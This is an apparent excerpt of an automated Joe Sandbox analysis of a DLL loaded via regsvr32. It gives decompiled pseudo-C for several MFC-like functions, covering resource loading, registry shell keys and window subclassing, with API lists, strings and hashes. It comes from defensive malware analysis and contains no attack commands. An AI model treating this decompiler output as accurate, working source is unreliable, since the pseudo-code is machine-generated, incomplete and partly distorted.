                                                                                                                • Opcode ID: d898d04734b4185a8928105493eb5070d0a6d0ee8ebb921ca0132d43c241309a
                                                                                                                • Instruction ID: a6efce3dbb9c2253d83b29fb9a4a92cf41fa315539aa0d7df2616f374f526431
                                                                                                                • Opcode Fuzzy Hash: d898d04734b4185a8928105493eb5070d0a6d0ee8ebb921ca0132d43c241309a
                                                                                                                • Instruction Fuzzy Hash: BC416BB95006499FEB61DFB5CC85BCA77E8FF05285F12482AE945DA141EF30FA448B21
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001D678 Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 28libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1001D678(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a100) {
				void* _v8;
				void* _v20;
				void* _t16;

				_t16 = __ecx;
				_a100 = _a100 + __edx;
			}






                                                                                                                0x1001d678
                                                                                                                0x1001d67d

                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32), ref: 1001D685
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 1001D6A6
                                                                                                                • GetProcAddress.KERNEL32(ReleaseActCtx), ref: 1001D6B8
                                                                                                                • GetProcAddress.KERNEL32(ActivateActCtx), ref: 1001D6CA
                                                                                                                • GetProcAddress.KERNEL32(DeactivateActCtx), ref: 1001D6DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                                • API String ID: 667068680-2424895508
                                                                                                                • Opcode ID: 13cae8bc9827f3ed2ee9d65c789eb52e5daba88252a32ef3fd7582a7348d6315
                                                                                                                • Instruction ID: 0cd57485817c8c7c4c622c9ee6dfae91d492b28f6457f0633034de1c6d42f173
                                                                                                                • Opcode Fuzzy Hash: 13cae8bc9827f3ed2ee9d65c789eb52e5daba88252a32ef3fd7582a7348d6315
                                                                                                                • Instruction Fuzzy Hash: 05F0DFBCD0422AEEEB10FB719DC8CC9BEA4EB053447024667E91892260F7349480AE92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001BE13 Relevance: 16.6, APIs: 11, Instructions: 139COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E1001BE13(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t54;
				void* _t58;
				signed int _t59;
				signed int _t63;
				signed short _t71;
				signed int _t84;
				void* _t94;
				struct HINSTANCE__* _t96;
				signed int _t97;
				void* _t98;
				signed int _t100;
				void* _t101;
				void* _t102;

				_t102 = __eflags;
				_t94 = __edx;
				_push(0x24);
				E10047680(0x1008f04f, __ebx, __edi, __esi);
				_t100 = __ecx;
				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
				 *(_t101 - 0x1c) =  *(__ecx + 0x60);
				 *(_t101 - 0x18) =  *(__ecx + 0x5c);
				_t54 = E1001E302(__ebx, __edi, __ecx, _t102);
				_t96 =  *(_t54 + 0xc);
				_t84 = 0;
				_t103 =  *(_t100 + 0x58);
				if( *(_t100 + 0x58) != 0) {
					_t96 =  *(E1001E302(0, _t96, _t100, _t103) + 0xc);
					_t54 = LoadResource(_t96, FindResourceA(_t96,  *(_t100 + 0x58), 5));
					 *(_t101 - 0x18) = _t54;
				}
				if( *(_t101 - 0x18) != _t84) {
					_t54 = LockResource( *(_t101 - 0x18));
					 *(_t101 - 0x1c) = _t54;
				}
				if( *(_t101 - 0x1c) != _t84) {
					_t86 = _t100;
					 *(_t101 - 0x14) = E1001B932(_t84, _t100, __eflags);
					E10014092(_t84, _t96, __eflags);
					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
					__eflags =  *(_t101 - 0x14) - _t84;
					 *(_t101 - 0x2c) = _t84;
					 *(_t101 - 0x24) = _t84;
					if(__eflags != 0) {
						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
						if(__eflags != 0) {
							__eflags = IsWindowEnabled( *(_t101 - 0x14));
							if(__eflags != 0) {
								EnableWindow( *(_t101 - 0x14), 0);
								 *(_t101 - 0x2c) = 1;
								_t84 = E10012730();
								__eflags = _t84;
								 *(_t101 - 0x24) = _t84;
								if(__eflags != 0) {
									_t86 = _t84;
									__eflags =  *((intOrPtr*)( *_t84 + 0x120))();
									if(__eflags != 0) {
										_t86 = _t84;
										__eflags = E1001795E(_t84);
										if(__eflags != 0) {
											_t86 = _t84;
											E10017979(_t84, 0);
											 *(_t101 - 0x28) = 1;
										}
									}
								}
							}
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
					E1001628E(_t96, __eflags, _t100);
					_t58 = E10013FEA(_t84, _t86, _t101,  *(_t101 - 0x14));
					_push(_t96);
					_push(_t58);
					_push( *(_t101 - 0x1c));
					_t59 = E1001BC23(_t84, _t100, _t94, _t96, _t100, __eflags);
					_t97 = 0;
					__eflags = _t59;
					if(_t59 != 0) {
						__eflags =  *(_t100 + 0x3c) & 0x00000010;
						if(( *(_t100 + 0x3c) & 0x00000010) != 0) {
							_t98 = 4;
							_t71 = E100177F8(_t100);
							__eflags = _t71 & 0x00000100;
							if((_t71 & 0x00000100) != 0) {
								_t98 = 5;
							}
							E10013B72(_t100, _t98);
							_t97 = 0;
							__eflags = 0;
						}
						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
							E10017C59(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *(_t101 - 0x28) - _t97;
					if( *(_t101 - 0x28) != _t97) {
						E10017979(_t84, 1);
					}
					__eflags =  *(_t101 - 0x2c) - _t97;
					if( *(_t101 - 0x2c) != _t97) {
						EnableWindow( *(_t101 - 0x14), 1);
					}
					__eflags =  *(_t101 - 0x14) - _t97;
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
						if(__eflags == 0) {
							SetActiveWindow( *(_t101 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t100 + 0x60))();
					E1001B96C(_t84, _t100, _t97, _t100, __eflags);
					__eflags =  *(_t100 + 0x58) - _t97;
					if( *(_t100 + 0x58) != _t97) {
						FreeResource( *(_t101 - 0x18));
					}
					_t63 =  *(_t100 + 0x44);
					goto L31;
				} else {
					_t63 = _t54 | 0xffffffff;
					L31:
					return E10047725(_t63);
				}
			}
















                                                                                                                0x1001be13
                                                                                                                0x1001be13
                                                                                                                0x1001be13
                                                                                                                0x1001be1a
                                                                                                                0x1001be1f
                                                                                                                0x1001be21
                                                                                                                0x1001be27
                                                                                                                0x1001be2d
                                                                                                                0x1001be30
                                                                                                                0x1001be35
                                                                                                                0x1001be38
                                                                                                                0x1001be3a
                                                                                                                0x1001be3d
                                                                                                                0x1001be44
                                                                                                                0x1001be55
                                                                                                                0x1001be5b
                                                                                                                0x1001be5b
                                                                                                                0x1001be61
                                                                                                                0x1001be66
                                                                                                                0x1001be6c
                                                                                                                0x1001be6c
                                                                                                                0x1001be72
                                                                                                                0x1001be7c
                                                                                                                0x1001be83
                                                                                                                0x1001be86
                                                                                                                0x1001be8b
                                                                                                                0x1001be8e
                                                                                                                0x1001be91
                                                                                                                0x1001be94
                                                                                                                0x1001be97
                                                                                                                0x1001be9f
                                                                                                                0x1001bea2
                                                                                                                0x1001bead
                                                                                                                0x1001beaf
                                                                                                                0x1001beb6
                                                                                                                0x1001bebc
                                                                                                                0x1001bec8
                                                                                                                0x1001beca
                                                                                                                0x1001becc
                                                                                                                0x1001becf
                                                                                                                0x1001bed3
                                                                                                                0x1001bedb
                                                                                                                0x1001bedd
                                                                                                                0x1001bedf
                                                                                                                0x1001bee6
                                                                                                                0x1001bee8
                                                                                                                0x1001beec
                                                                                                                0x1001beee
                                                                                                                0x1001bef3
                                                                                                                0x1001bef3
                                                                                                                0x1001bee8
                                                                                                                0x1001bedd
                                                                                                                0x1001becf
                                                                                                                0x1001beaf
                                                                                                                0x1001bea2
                                                                                                                0x1001befa
                                                                                                                0x1001beff
                                                                                                                0x1001bf07
                                                                                                                0x1001bf0c
                                                                                                                0x1001bf0d
                                                                                                                0x1001bf0e
                                                                                                                0x1001bf13
                                                                                                                0x1001bf18
                                                                                                                0x1001bf1a
                                                                                                                0x1001bf1c
                                                                                                                0x1001bf1e
                                                                                                                0x1001bf22
                                                                                                                0x1001bf26
                                                                                                                0x1001bf29
                                                                                                                0x1001bf2e
                                                                                                                0x1001bf32
                                                                                                                0x1001bf36
                                                                                                                0x1001bf36
                                                                                                                0x1001bf3a
                                                                                                                0x1001bf3f
                                                                                                                0x1001bf3f
                                                                                                                0x1001bf3f
                                                                                                                0x1001bf41
                                                                                                                0x1001bf44
                                                                                                                0x1001bf52
                                                                                                                0x1001bf52
                                                                                                                0x1001bf44
                                                                                                                0x1001bf57
                                                                                                                0x1001bf7a
                                                                                                                0x1001bf7d
                                                                                                                0x1001bf83
                                                                                                                0x1001bf83
                                                                                                                0x1001bf88
                                                                                                                0x1001bf8b
                                                                                                                0x1001bf92
                                                                                                                0x1001bf92
                                                                                                                0x1001bf98
                                                                                                                0x1001bf9b
                                                                                                                0x1001bfa3
                                                                                                                0x1001bfa6
                                                                                                                0x1001bfab
                                                                                                                0x1001bfab
                                                                                                                0x1001bfa6
                                                                                                                0x1001bfb5
                                                                                                                0x1001bfba
                                                                                                                0x1001bfbf
                                                                                                                0x1001bfc2
                                                                                                                0x1001bfc7
                                                                                                                0x1001bfc7
                                                                                                                0x1001bfcd
                                                                                                                0x00000000
                                                                                                                0x1001be74
                                                                                                                0x1001be74
                                                                                                                0x1001bfd0
                                                                                                                0x1001bfd5
                                                                                                                0x1001bfd5

                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 1001BE1A
                                                                                                                • FindResourceA.KERNEL32 ref: 1001BE4D
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 1001BE55
                                                                                                                • LockResource.KERNEL32(?,00000024,10002FE0,0000035C), ref: 1001BE66
                                                                                                                • GetDesktopWindow.USER32 ref: 1001BE99
                                                                                                                • IsWindowEnabled.USER32(?), ref: 1001BEA7
                                                                                                                • EnableWindow.USER32(?,00000000), ref: 1001BEB6
                                                                                                                  • Part of subcall function 1001795E: IsWindowEnabled.USER32(?), ref: 10017967
                                                                                                                  • Part of subcall function 10017979: EnableWindow.USER32(?,?), ref: 10017986
                                                                                                                • EnableWindow.USER32(?,00000001), ref: 1001BF92
                                                                                                                • GetActiveWindow.USER32 ref: 1001BF9D
                                                                                                                • SetActiveWindow.USER32(?), ref: 1001BFAB
                                                                                                                • FreeResource.KERNEL32(?,?,00000024,10002FE0,0000035C), ref: 1001BFC7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1509511306-0
                                                                                                                • Opcode ID: d34204b40df7c202cc3224c9b72ec68b61058b99a552d90991c186c7926b9ed6
                                                                                                                • Instruction ID: 396292340296106368fb6444aaf32842fcf05ff203fa84e718e3a48a4a1359f2
                                                                                                                • Opcode Fuzzy Hash: d34204b40df7c202cc3224c9b72ec68b61058b99a552d90991c186c7926b9ed6
                                                                                                                • Instruction Fuzzy Hash: AB518B34A00B05CBDB11DFA5CD896AEBBF1FF48742F11006DE642AA2A1CB75D982CF51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001AA97 Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 213COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E1001AA97(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				signed int _v4;
				char _v8;
				char _v16;
				char _v20;
				char* _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				long _v44;
				char _t90;
				intOrPtr _t103;
				char _t107;
				char* _t135;
				intOrPtr _t154;
				char* _t157;
				intOrPtr _t159;
				intOrPtr _t190;
				intOrPtr* _t193;
				long _t194;
				intOrPtr _t196;
				intOrPtr _t197;
				char* _t198;
				void* _t199;
				void* _t201;
				void* _t202;

				_t191 = __edx;
				_t159 =  *((intOrPtr*)(__ecx + 0x58));
				if(_t159 != 0) {
					_push(0x20);
					E1004764D(0x1008fcc5, __ebx, __edi, __esi);
					_t196 = _t159;
					L1000140B( &_v36, E100184C0());
					_v4 = _v4 & 0x00000000;
					L1000140B( &_v16, E100184C0());
					_v4 = 1;
					E10029AB3(__ebx, __edx,  *((intOrPtr*)(E1001E302(__ebx, __edi, _t196, __eflags) + 8)),  &_v36);
					_t90 =  *((intOrPtr*)(_t196 + 8));
					__eflags = _t90;
					_v32 = _t90;
					if(_t90 != 0) {
						_t197 = _t196 + 4;
						__eflags = _t197;
						_v40 = _t197;
						_t157 = "%s\\shell\\printto\\%s";
						_t198 = "command";
						do {
							_t193 =  *((intOrPtr*)(E10012115( &_v32)));
							L1000140B( &_v24, E100184C0());
							_v4 = 2;
							L1000140B( &_v20, E100184C0());
							_v4 = 3;
							L1000140B( &_v28, E100184C0());
							_v4 = 4;
							_t103 =  *((intOrPtr*)( *_t193 + 0x64))( &_v20, 5);
							__eflags = _t103;
							if(_t103 != 0) {
								_t107 = _v20;
								__eflags =  *((intOrPtr*)(_t107 - 0xc));
								if( *((intOrPtr*)(_t107 - 0xc)) != 0) {
									__eflags =  *((intOrPtr*)( *_t193 + 0x64))( &_v28, 6);
									if(__eflags == 0) {
										E10018A1F(_t157,  &_v28, _t199,  &_v20);
									}
									L1000106E( &_v16, "%s\\DefaultIcon", _v20);
									_t202 = _t201 + 0xc;
									E10027605(_t191, __eflags, _v16);
									__eflags =  *((intOrPtr*)( *_t193 + 0x64))( &_v16, 0);
									if(__eflags == 0) {
										L14:
										_push("ddeexec");
										L1000106E( &_v16, "%s\\shell\\open\\%s", _v20);
										E10027605(_t191, __eflags, _v16);
										_push("ddeexec");
										L1000106E( &_v16, "%s\\shell\\print\\%s", _v20);
										E10027605(_t191, __eflags, _v16);
										_push("ddeexec");
										L1000106E( &_v16, _t157, _v20);
										_t202 = _t202 + 0x30;
										E10027605(_t191, __eflags, _v16);
									} else {
										__eflags =  *((intOrPtr*)(_v16 - 0xc));
										if(__eflags == 0) {
											goto L14;
										}
									}
									L1000106E( &_v16, "%s\\shell\\open\\%s", _v20);
									E10027605(_t191, __eflags, _v16);
									L1000106E( &_v16, "%s\\shell\\print\\%s", _v20);
									E10027605(_t191, __eflags, _v16);
									L1000106E( &_v16, _t157, _v20);
									_t201 = _t202 + 0x30;
									E10027605(_t191, __eflags, _v16);
									 *((intOrPtr*)( *_t193 + 0x64))( &_v24, 4, _t198, _t198, _t198);
									_t135 = _v24;
									__eflags =  *((intOrPtr*)(_t135 - 0xc));
									if( *((intOrPtr*)(_t135 - 0xc)) != 0) {
										_v44 = 0x208;
										_t194 = RegQueryValueA(0x80000000, _v24, L100011F4( &_v16, 0x208),  &_v44);
										E1000FED3( &_v16, 0xffffffff);
										__eflags = _t194;
										if(__eflags != 0) {
											L19:
											L1000106E( &_v16, "%s\\ShellNew", _v24);
											_t201 = _t201 + 0xc;
											E10027605(_t191, __eflags, _v16);
											E10027605(_t191, __eflags, _v24);
										} else {
											__eflags =  *((intOrPtr*)(_v16 - 0xc)) - _t194;
											if(__eflags == 0) {
												goto L19;
											} else {
												__eflags = E1001BBE2(_t157,  &_v16, _t191, _t194, _t198, _t199, _v20);
												if(__eflags == 0) {
													goto L19;
												}
											}
										}
									}
								}
							}
							L100013E3(_v28 + 0xfffffff0, _t191);
							L100013E3(_v20 + 0xfffffff0, _t191);
							_v4 = 1;
							L100013E3( &(_v24[0xfffffffffffffff0]), _t191);
							__eflags = _v32;
						} while (_v32 != 0);
					}
					L100013E3(_v16 + 0xfffffff0, _t191);
					__eflags = _v36 + 0xfffffff0;
					return E10047725(L100013E3(_v36 + 0xfffffff0, _t191));
				} else {
					_push(_t199);
					_push(_t159);
					_v8 = 0x100b8618;
					L10048E48( &_v8, 0x100aff30);
					asm("int3");
					_push(4);
					E1004764D(0x1008dd26, __ebx, __edi, __esi);
					_t190 = E10020454(0x104);
					_v20 = _t190;
					_t154 = 0;
					_v8 = 0;
					if(_t190 != 0) {
						_t154 = E1001DB72(_t190);
					}
					return E10047725(_t154);
				}
			}





























                                                                                                                0x1001aa97
                                                                                                                0x1001aa97
                                                                                                                0x1001aa9c
                                                                                                                0x10027ef2
                                                                                                                0x10027ef9
                                                                                                                0x10027efe
                                                                                                                0x10027f09
                                                                                                                0x10027f0e
                                                                                                                0x10027f1b
                                                                                                                0x10027f20
                                                                                                                0x10027f31
                                                                                                                0x10027f36
                                                                                                                0x10027f39
                                                                                                                0x10027f3b
                                                                                                                0x10027f3e
                                                                                                                0x10027f44
                                                                                                                0x10027f44
                                                                                                                0x10027f47
                                                                                                                0x10027f4a
                                                                                                                0x10027f4f
                                                                                                                0x10027f54
                                                                                                                0x10027f60
                                                                                                                0x10027f6b
                                                                                                                0x10027f70
                                                                                                                0x10027f7d
                                                                                                                0x10027f82
                                                                                                                0x10027f8f
                                                                                                                0x10027f9e
                                                                                                                0x10027fa2
                                                                                                                0x10027fa5
                                                                                                                0x10027fa7
                                                                                                                0x10027fad
                                                                                                                0x10027fb0
                                                                                                                0x10027fb4
                                                                                                                0x10027fc7
                                                                                                                0x10027fc9
                                                                                                                0x10027fd2
                                                                                                                0x10027fd2
                                                                                                                0x10027fe3
                                                                                                                0x10027fe8
                                                                                                                0x10027fee
                                                                                                                0x10028000
                                                                                                                0x10028002
                                                                                                                0x1002800d
                                                                                                                0x1002800d
                                                                                                                0x1002801e
                                                                                                                0x10028029
                                                                                                                0x1002802e
                                                                                                                0x1002803f
                                                                                                                0x1002804a
                                                                                                                0x1002804f
                                                                                                                0x1002805c
                                                                                                                0x10028061
                                                                                                                0x10028067
                                                                                                                0x10028004
                                                                                                                0x10028007
                                                                                                                0x1002800b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002800b
                                                                                                                0x10028079
                                                                                                                0x10028084
                                                                                                                0x10028096
                                                                                                                0x100280a1
                                                                                                                0x100280af
                                                                                                                0x100280b4
                                                                                                                0x100280ba
                                                                                                                0x100280c9
                                                                                                                0x100280cc
                                                                                                                0x100280cf
                                                                                                                0x100280d3
                                                                                                                0x100280de
                                                                                                                0x100280fe
                                                                                                                0x10028100
                                                                                                                0x10028105
                                                                                                                0x10028107
                                                                                                                0x10028120
                                                                                                                0x1002812c
                                                                                                                0x10028131
                                                                                                                0x10028137
                                                                                                                0x1002813f
                                                                                                                0x10028109
                                                                                                                0x1002810c
                                                                                                                0x1002810f
                                                                                                                0x00000000
                                                                                                                0x10028111
                                                                                                                0x1002811c
                                                                                                                0x1002811e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002811e
                                                                                                                0x1002810f
                                                                                                                0x10028107
                                                                                                                0x100280d3
                                                                                                                0x10027fb4
                                                                                                                0x1002814a
                                                                                                                0x10028155
                                                                                                                0x10028160
                                                                                                                0x10028164
                                                                                                                0x10028169
                                                                                                                0x10028169
                                                                                                                0x10027f54
                                                                                                                0x10028179
                                                                                                                0x10028181
                                                                                                                0x1002818e
                                                                                                                0x1001aa9e
                                                                                                                0x1000a069
                                                                                                                0x1000a06c
                                                                                                                0x1000a076
                                                                                                                0x1000a07d
                                                                                                                0x1000a082
                                                                                                                0x1000a083
                                                                                                                0x1000a08a
                                                                                                                0x1000a099
                                                                                                                0x1000a09b
                                                                                                                0x1000a09e
                                                                                                                0x1000a0a2
                                                                                                                0x1000a0a5
                                                                                                                0x1000a0a7
                                                                                                                0x1000a0a7
                                                                                                                0x1000a0b1
                                                                                                                0x1000a0b1

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3
                                                                                                                • String ID: %s\DefaultIcon$%s\ShellNew$%s\shell\open\%s$%s\shell\print\%s$%s\shell\printto\%s$command$ddeexec
                                                                                                                • API String ID: 431132790-556638191
                                                                                                                • Opcode ID: 376e346b3a938ab882f94d3ede848e6f5f87ce7a4678c1daf7e28a5ccc18b777
                                                                                                                • Instruction ID: a883703464cde51ad283cf1ffd4eee1045023c49d791b7e8cf4ffdc85c46f849
                                                                                                                • Opcode Fuzzy Hash: 376e346b3a938ab882f94d3ede848e6f5f87ce7a4678c1daf7e28a5ccc18b777
                                                                                                                • Instruction Fuzzy Hash: F581587490011AABDF01EBA4CC86EFEB7B9FF04344F500118F119B7192EB31AA51CB65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10015EF7 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E10015EF7(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t31;
				void* _t33;
				void* _t34;
				void* _t40;
				void* _t43;
				void* _t60;
				void* _t64;
				struct HWND__* _t66;
				CHAR* _t68;
				void* _t71;

				_t64 = __edx;
				_t60 = __ecx;
				_push(0x40);
				E10047680(0x1008ea63, __ebx, __edi, __esi);
				_t66 =  *(_t71 + 8);
				_t68 = "AfxOldWndProc423";
				_t31 = GetPropA(_t66, _t68);
				 *(_t71 - 0x14) =  *(_t71 - 0x14) & 0x00000000;
				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
				 *(_t71 - 0x18) = _t31;
				_t58 = 1;
				_t33 =  *(_t71 + 0xc) - 6;
				if(_t33 == 0) {
					_t34 = E10013FEA(1, _t60, _t71,  *(_t71 + 0x14));
					E10015E0B(_t60, E10013FEA(1, _t60, _t71, _t66),  *(_t71 + 0x10), _t34);
					goto L9;
				} else {
					_t40 = _t33 - 0x1a;
					if(_t40 == 0) {
						_t58 = 0 | E10015E81(1, _t66, E10013FEA(1, _t60, _t71, _t66),  *(_t71 + 0x14),  *(_t71 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t58 != 0) {
							goto L10;
						}
					} else {
						_t43 = _t40 - 0x62;
						if(_t43 == 0) {
							SetWindowLongA(_t66, 0xfffffffc,  *(_t71 - 0x18));
							RemovePropA(_t66, _t68);
							GlobalDeleteAtom(GlobalFindAtomA(_t68));
							goto L10;
						} else {
							if(_t43 != 0x8e) {
								L10:
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66,  *(_t71 + 0xc),  *(_t71 + 0x10),  *(_t71 + 0x14));
							} else {
								E10012935(E10013FEA(1, _t60, _t71, _t66), _t71 - 0x30, _t71 - 0x1c);
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66, 0x110,  *(_t71 + 0x10),  *(_t71 + 0x14));
								E1001485E(1, _t64, _t49, _t71 - 0x30,  *((intOrPtr*)(_t71 - 0x1c)));
							}
						}
					}
				}
				return E10047725( *(_t71 - 0x14));
			}













                                                                                                                0x10015ef7
                                                                                                                0x10015ef7
                                                                                                                0x10015ef7
                                                                                                                0x10015efe
                                                                                                                0x10015f03
                                                                                                                0x10015f06
                                                                                                                0x10015f0d
                                                                                                                0x10015f13
                                                                                                                0x10015f17
                                                                                                                0x10015f1b
                                                                                                                0x10015f23
                                                                                                                0x10015f24
                                                                                                                0x10015f27
                                                                                                                0x10015fd0
                                                                                                                0x10015fe2
                                                                                                                0x00000000
                                                                                                                0x10015f2d
                                                                                                                0x10015f2d
                                                                                                                0x10015f30
                                                                                                                0x10015fc8
                                                                                                                0x10015fe7
                                                                                                                0x10015fe9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10015f32
                                                                                                                0x10015f32
                                                                                                                0x10015f35
                                                                                                                0x10015f8e
                                                                                                                0x10015f96
                                                                                                                0x10015fa4
                                                                                                                0x00000000
                                                                                                                0x10015f37
                                                                                                                0x10015f3c
                                                                                                                0x10015feb
                                                                                                                0x10015ffe
                                                                                                                0x10015f42
                                                                                                                0x10015f53
                                                                                                                0x10015f70
                                                                                                                0x10015f78
                                                                                                                0x10015f78
                                                                                                                0x10015f3c
                                                                                                                0x10015f35
                                                                                                                0x10015f30
                                                                                                                0x10015f85

                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 10015EFE
                                                                                                                • GetPropA.USER32(?,AfxOldWndProc423), ref: 10015F0D
                                                                                                                • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 10015F67
                                                                                                                  • Part of subcall function 1001485E: GetWindowRect.USER32 ref: 10014886
                                                                                                                  • Part of subcall function 1001485E: GetWindow.USER32(?,00000004), ref: 100148A3
                                                                                                                • SetWindowLongA.USER32 ref: 10015F8E
                                                                                                                • RemovePropA.USER32(?,AfxOldWndProc423), ref: 10015F96
                                                                                                                • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 10015F9D
                                                                                                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 10015FA4
